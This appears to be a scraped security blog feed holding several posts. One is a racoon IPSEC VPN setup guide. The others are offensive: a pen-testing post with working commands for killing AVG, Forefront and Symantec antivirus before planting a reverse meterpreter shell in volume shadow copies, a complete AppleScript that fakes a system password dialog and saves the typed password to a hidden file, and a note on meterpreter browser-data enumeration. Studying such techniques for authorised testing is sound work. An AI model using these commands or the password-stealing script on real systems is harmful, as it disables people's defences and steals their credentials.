UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]-->
<!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin:0in;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Cambria;
mso-ascii-font-family:Cambria;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Cambria;
mso-hansi-theme-font:minor-latin;}
</style>
<![endif]-->
<!--StartFragment-->
<br />
<div class="MsoNormal">
<span style="font-family: Times, Times New Roman, serif;">Although the <b>/etc/racoon/psk.txt</b> file would typically
contain entries listing individual IP addresses, you can also have wildcard
entries. Naturally when travelling your
MAC-OSX client is going to have a different public IP address depending on your
location, and thus a wildcard pre-shared key file on the server end of things
is the easiest solution. A better
solution, as mentioned above, would be to utilize a certificate rather than
pre-shared key.</span></div>
<div class="MsoNormal">
<span style="font-family: Times, Times New Roman, serif;"><br />
In order to generate a pre-shared key, I would suggest a relatively long random
character string. This is fairly easy
to generate using a combination of “dd” and “base64” in the UNIX world,
although other options exist. </span>
<br />
<span style="font-family: Times, Times New Roman, serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">$ dd if=/dev/urandom bs=1 count=18
2>/dev/null | base64<br />
mylongrandomstring</span><br />
<br />
<span style="font-family: Times, Times New Roman, serif;">Within your /etc/racoon/psk.txt pre-shared key file on the UNIX/Linux
server, you should list one entry as follows:</span>
<br />
<span style="font-family: Times, Times New Roman, serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"># pre-shared key for IPSEC VPN clients<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Courier New, Courier, monospace;">* mylongrandomstring</span><span style="font-family: Georgia, Times New Roman, serif;"><o:p></o:p></span></div>
<br />
<span style="font-family: Times, Times New Roman, serif;">
Note that the string “mylongrandomstring” would actually be random characters
you generated from the above command.</span><!--EndFragment--><span style="font-family: Times, Times New Roman, serif;"></span><br />
<span style="font-family: Times, Times New Roman, serif;"><br /></span>
<span style="font-family: Times, Times New Roman, serif;"><br /></span>
<span style="font-family: Times, Times New Roman, serif;"><br /></span>
<br />
<h3>
<span style="font-family: Times, Times New Roman, serif;">MAC-OSX Mountain Lion: Cisco IPSEC VPN Client</span></h3>
To setup your MAC-OSX IPSEC client, you need to open Network
Preferences, click on the “Lock” to make changes, and then click on the small
“+” at the bottom left of the dialog to ADD a new interface. <br />
<div class="MsoNormal">
<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3rGuuExMlhz9nHtAoVfp_-R6UJb9ctkFlxzkTc8EE8sjUZWWc4AvVRjRTall71fR6LEuB2-P0-mM2jwTP8_VDAcrWT_07a5TE1LV81G9nAPAoq4g0UzNqsgmhvonFap6CFpa2Mbk-5Y0/s1600/Screen+Shot+2012-12-31+at+11.37.20+PM.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="151" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3rGuuExMlhz9nHtAoVfp_-R6UJb9ctkFlxzkTc8EE8sjUZWWc4AvVRjRTall71fR6LEuB2-P0-mM2jwTP8_VDAcrWT_07a5TE1LV81G9nAPAoq4g0UzNqsgmhvonFap6CFpa2Mbk-5Y0/s320/Screen+Shot+2012-12-31+at+11.37.20+PM.png" width="320" /></a></div>
<br />
<br />
<div class="MsoNormal">
<br />
<br />
<br />
Set the interface type to “VPN”, and VPN Type to “Cisco IPSec”, and then type in a descriptive service name.</div>
<div class="MsoNormal">
<br />
<!--[if gte vml 1]><v:shapetype id="_x0000_t75"
coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe"
filled="f" stroked="f">
<v:stroke joinstyle="miter"/>
<v:formulas>
<v:f eqn="if lineDrawn pixelLineWidth 0"/>
<v:f eqn="sum @0 1 0"/>
<v:f eqn="sum 0 0 @1"/>
<v:f eqn="prod @2 1 2"/>
<v:f eqn="prod @3 21600 pixelWidth"/>
<v:f eqn="prod @3 21600 pixelHeight"/>
<v:f eqn="sum @0 0 1"/>
<v:f eqn="prod @6 1 2"/>
<v:f eqn="prod @7 21600 pixelWidth"/>
<v:f eqn="sum @8 21600 0"/>
<v:f eqn="prod @7 21600 pixelHeight"/>
<v:f eqn="sum @10 21600 0"/>
</v:formulas>
<v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_1" o:spid="_x0000_i1027" type="#_x0000_t75"
alt="Description: Macintosh HD:Users:jsthyer:Desktop:Screen Shot 2012-12-31 at 11.37.20 PM.png"
style='width:270pt;height:128pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="file://localhost/Users/jsthyer/Library/Caches/TemporaryItems/msoclip/0/clip_image001.png"
o:title="Screen Shot 2012-12-31 at 11.37.20 PM.png"/>
</v:shape><![endif]--><!--[if !vml]--><!--[endif]--><o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<!--[if gte vml 1]><v:shape
id="Picture_x0020_2" o:spid="_x0000_i1026" type="#_x0000_t75" alt="Description: Macintosh HD:Users:jsthyer:Desktop:Screen Shot 2012-12-31 at 11.40.23 PM.png"
style='width:298pt;height:270pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="file://localhost/Users/jsthyer/Library/Caches/TemporaryItems/msoclip/0/clip_image003.png"
o:title="Screen Shot 2012-12-31 at 11.40.23 PM.png"/>
</v:shape><![endif]--><!--[if !vml]--><!--[endif]--><o:p></o:p></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinV54wvigeRKAHOSsnoOVMTTdj_bwblIOQD4zYLfUVitUqqvBaIHox3P2lpKGGH0IMEmsnRj0yaSl3f644ZS9kwzwy9PVvfc8ZWOuDVprTVdX3aJKeAY6QVa5JCMQ781aQd8u_HNYP3V0/s1600/Screen+Shot+2012-12-31+at+11.40.23+PM.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="291" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinV54wvigeRKAHOSsnoOVMTTdj_bwblIOQD4zYLfUVitUqqvBaIHox3P2lpKGGH0IMEmsnRj0yaSl3f644ZS9kwzwy9PVvfc8ZWOuDVprTVdX3aJKeAY6QVa5JCMQ781aQd8u_HNYP3V0/s320/Screen+Shot+2012-12-31+at+11.40.23+PM.png" width="320" /></a></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgwHERczS3KOIk-sFOgwFgm23XZFftoCbtvSfnLdv285nfYV62q1qjgaHNdoJDf4HOdKz_wXGYndCQtvcoQSQkfs90ZRW3IoBUVLDdWwJ0FrZNdu7YirqIOMi2O68z4yjLzVh-bW7zol0/s1600/Screen+Shot+2012-12-31+at+11.39.31+PM.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="164" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgwHERczS3KOIk-sFOgwFgm23XZFftoCbtvSfnLdv285nfYV62q1qjgaHNdoJDf4HOdKz_wXGYndCQtvcoQSQkfs90ZRW3IoBUVLDdWwJ0FrZNdu7YirqIOMi2O68z4yjLzVh-bW7zol0/s320/Screen+Shot+2012-12-31+at+11.39.31+PM.png" width="320" /></a><br />
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Click on your new IPSEC VPN connection, and enter the appropriate address or domain name of your remote server, as well as your UNIX/Linux username that you will use to connect.</div>
<div class="MsoNormal">
<o:p></o:p></div>
<div class="MsoNormal">
<br />
<br /></div>
<br />
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<!--EndFragment--></div>
Next, click on the “Authentication Setttings” button and set the “Shared Secret” to the same long random string you used for the pre-shared key on the server. Leave the “Group Name” blank, and click OK.<br />
<br />
<br />
<br />
<br />
<h3>
Testing The Configuration</h3>
<div>
If you use the "strict_address" configuration in the "listen" section of the racoon configuration, you can only test from outside your home network. However, if we assume that your home Linux router gateway also has a second interface for "internal" network traffic, the entire listen section of the racoon.conf file can be commented out during testing to make racoon listen on all interfaces as follows.</div>
<div>
<br /></div>
<div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;">#listen {<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"># adminsock disabled; #do not listen on the admin socket<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"># isakmp 240.9.9.9 [500]; #address for ISAKMP<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"># isakmp_natt 240.9.9.9 [4500]; #address for ISAKMP NAT-Traversal<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"># strict_address; #strictly bind these addresses<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;">#}</span></span><br />
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"><br /></span></span>
For testing purposes, you should use either a console on your linux server, or ssh in from another machine, and then run racoon in debugging mode from the command line as root.<br />
<br />
<span style="font-family: Courier New, Courier, monospace;"># service racoon stop</span><br />
<span style="font-family: Courier New, Courier, monospace;"># /usr/sbin/racoon -F -d</span><br />
<br />
The "-F" flag instructs racoon to log all output to stdout/screen. The more "-d" flags you add to the command line, the more debugging output you should received. After starting racoon on the command line, you should attempt to connect from your MAC-OSX system.<br />
<br />
Assuming that your group pre-shared key matches, if you get through IPSEC key management negotiation phase 1, your MAC-OSX system should prompt you for a username and password. This username has to be a UNIX/Linux based username that has been added to the server system. If successful, you should see your "banner" message of the day displayed, and receive a VPN pool IP address in the 10.222.1.0/24 network. You can then put racoon back into normal running mode, and you have successfully configured a remote access VPN.<br />
<br />
<br />
<span style="font-family: Courier New, Courier, monospace;"># /usr/sbin/racoon -F -d</span><br />
<div>
<span style="font-family: Courier New, Courier, monospace;"># CTRL-c</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"># service racoon start</span></div>
<div>
<br />
<br /></div>
Good luck, and please post comments/questions on your experience.<br />
<br />
<br /></div>
</div>
<!--EndFragment-->Unknownnoreply@blogger.com17tag:blogger.com,1999:blog-2320276621879394553.post-49187682263798806742011-12-05T10:44:00.000-08:002011-12-05T10:47:32.663-08:00Disabling AntiVirus when Pen TestingWhen penetration testing, and targeting Windows systems, writing some executable content to the file system is invariably required at some stage. Unfortunately today, the antivirus vendors have become quite adept with signatures that match assembly stub routines that are used to inject malware into a system. The A/V guys will also pick up on common service executable files such as being used with Metasploit’s bypassuac. Let’s face it, we still need to write stuff into temp directories from time to time.<br />
<br />
Mark Baggett, and Tim Tomes recently presented some nice techniques on hiding malware within Windows volume shadow copies (<a href="http://www.irongeek.com/i.php?page=videos/hack3rcon2/tim-tomes-and-mark-baggett-lurking-in-the-shadows">http://www.irongeek.com/i.php?page=videos/hack3rcon2/tim-tomes-and-mark-baggett-lurking-in-the-shadows</a>). Since it is unlikely for A/V products to be able to scan volume shadow copies, and the capability to create a process from a volume shadow copy using ‘wmic’ exists, then we would likely want to follow this sequence of tasks during a test:<br />
<br />
a) Disable the A/V product of choice.<br />
b) Upload our favorite/useful executable content. (perhaps a reverse TCP meterpreter shell or similar)<br />
c) Upload Mark and Tim’s excellent vssown.vbs script<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>a. Enable service and create volume shadow copy.<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>b. Disable volume shadow copy service.<br />
d) Delete our favorite/useful executable content and modified timestamps accordingly assuming we want to be somewhat stealthy.<br />
e) Execute our content from the volume shadow copy using ‘wmic’ using the excellent vssown script, or just through ‘wmic process call create’.<br />
<br />
The challenge presented is whether we can effectively disable the antivirus product of choice. Listed below are some possible techniques for three popular products which may get us what we need. None of these techniques are stealthy from a user interface perspective. Otherwise said, Windows security center and the A/V tray executable files themselves will try to inform the user that something is broken when we proceed with these recipes.<br />
<br />
<br />
1. Grisoft’s AVG<br />
<br />
Using the 2012 Freeware version, I note the following information about AVG. Services running are the AVG watchdog (avgwd), and the AVG IDS agent (avgidsagent). The running processes are as follows: avgidsagent.exe, avgwdsvc.exe, avgemca.exe, avgrsa.exe, avgcsrva.exe, and avgnsa.exe. The watchdog process is very persistent at restarting things, is not killable, and neither is the service stoppable.<br />
<br />
DISABLING:<br />
a. Rename the binary files in %systemroot%\program files\avg\avg2012\ as follows.<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><b>C:\> cd %systemroot%\program files\avg\avg2012</b></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><b>C:\> move avgcsrva.exe avgcsrva_.exe</b></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><b>C:\> move avgemca.exe avgemca_.exe</b></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><b>C:\> move avgnsa.exe avgnsa_.exe</b></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><b>C:\> move avgrsa.exe avgrsa_.exe</b></span><br />
<br />
b. Kill the running processes simultaneously with a one line (wildcard powered) wmic command.<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><b>C:\> wmic process where “name like ‘avg[cenr]%.exe’” delete</b></span><br />
<br />
c. The watchdog service will to restart all of the binaries but fail.<br />
<br />
ENABLING: Rename all of the binaries back to their original names, and the watchdog process will take care of the rest.<br />
<br />
<br />
2. Microsoft Forefront<br />
<br />
The service name is “msmpsvc”, and the running processes are msmpeng.exe, and msseces.exe, one being the engine and the other being the GUI reporting/configuration tool respectively.<br />
<br />
DISABLING: kill the GUI tool and stop the A/V engine service.<br />
<br />
<b><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">C:\> wmic process where name=”msseces.exe” delete</span></b><br />
<b><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">C:\> sc stop msmpsvc</span></b><br />
<br />
ENABLING: start the A/V service engine, and start the GUI process.<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><b>C:\> cd \Program Files\Microsoft Security Client</b></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><b>C:\> sc start msmpsvc</b></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><b>C:\> msseces.exe</b></span><br />
<br />
<br />
3. Symantec Endpoint Protection<br />
<br />
The services running are ccEvtMgr, ccSetMgr, smcservice, and “Symantec AntiVirus”. The processes that matter are smb.exe, and smcgui.exe.<br />
<br />
DISABLING: kill the processes, and stop the services. I found that the event manager (ccEvtMgr), and settings manager (ccSetMgr) service can remain running without any impact.<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><b>C:\> wmic process where “name like ‘%smc%.exe’” delete</b></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><b>C:\> sc stop smcservice</b></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><b>C:\> sc stop “Symantec AntiVirus”</b></span><br />
<br />
ENABLING: restarting just the smcservice will start everything else back up again.<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><b>C:\> sc start smcservice</b></span>Unknownnoreply@blogger.com7tag:blogger.com,1999:blog-2320276621879394553.post-39877744755111614562011-10-25T14:41:00.000-07:002011-10-25T14:41:02.703-07:00Fun with AppleScript--<br />
-- Description: This script prompts the user to enter their password<br />
-- in order to perform a privileged function. The password<br />
-- is subsequently saved to a hidden file in their home directory.<br />
-- The "Cancel" button is the default on the dialog which<br />
-- will hopefully encourage the user to enter accurate info.<br />
--<br />
-- Author: Joff Thyer, October 2011<br />
--<br />
set filename to ((path to home folder) as string) & ".mpass"<br />
set myprompt to "Type your password to allow System Preferences to make changes"<br />
<br />
set ans to "Cancel"<br />
repeat<br />
try<br />
set d_returns to display dialog myprompt default answer "" with hidden answer buttons {"Cancel", "OK"} default button "Cancel" with icon path to resource "LockedIcon.icns" in bundle "/System/Library/CoreServices/CoreTypes.bundle"<br />
set ans to button returned of d_returns<br />
set mypass to text returned of d_returns<br />
if ans = "OK" then exit repeat<br />
end try<br />
end repeat<br />
<br />
try<br />
set now to do shell script "date '+%Y%m%d_%H%M%S:'"<br />
set myfile to open for access filename with write permission<br />
set outstr to now & mypass & "<br />
"<br />
write outstr to myfile starting at eof<br />
close access myfile<br />
on error<br />
try<br />
close access myfile<br />
end try<br />
end tryUnknownnoreply@blogger.com1tag:blogger.com,1999:blog-2320276621879394553.post-58857163665992452912011-07-15T09:05:00.000-07:002011-07-15T09:05:40.109-07:00Using metasploit meterpreter scripts enum_firefox.rb and enum_chrome.rbTwo useful meterpreter scripts for enumerating client browser data are enum_firefox.rb and enum_chrome.rb located in the framework scripts/meterpreter directory.<br />
<br />
It is important to understand that both of these scripts require sqlite3 be properly installed on your exploitation system. Assuming your exploitation system is Ubuntu Linux for a moment, you can ensure that sqlite3 dependencies are installed as follows:<br />
<br />
sudo apt-get install sqlite3<br />
sudo apt-get install libsqlite3-dev<br />
sudo gem install sqlite3-ruby<br />
<br />
Once this has completed, then restart your msfconsole, exploit away and run the appropriate browser enumeration scripts. Output from your enumeration will be stored in the msf config directory with the following path.<br />
<br />
log/scripts/enum_firefox<br />
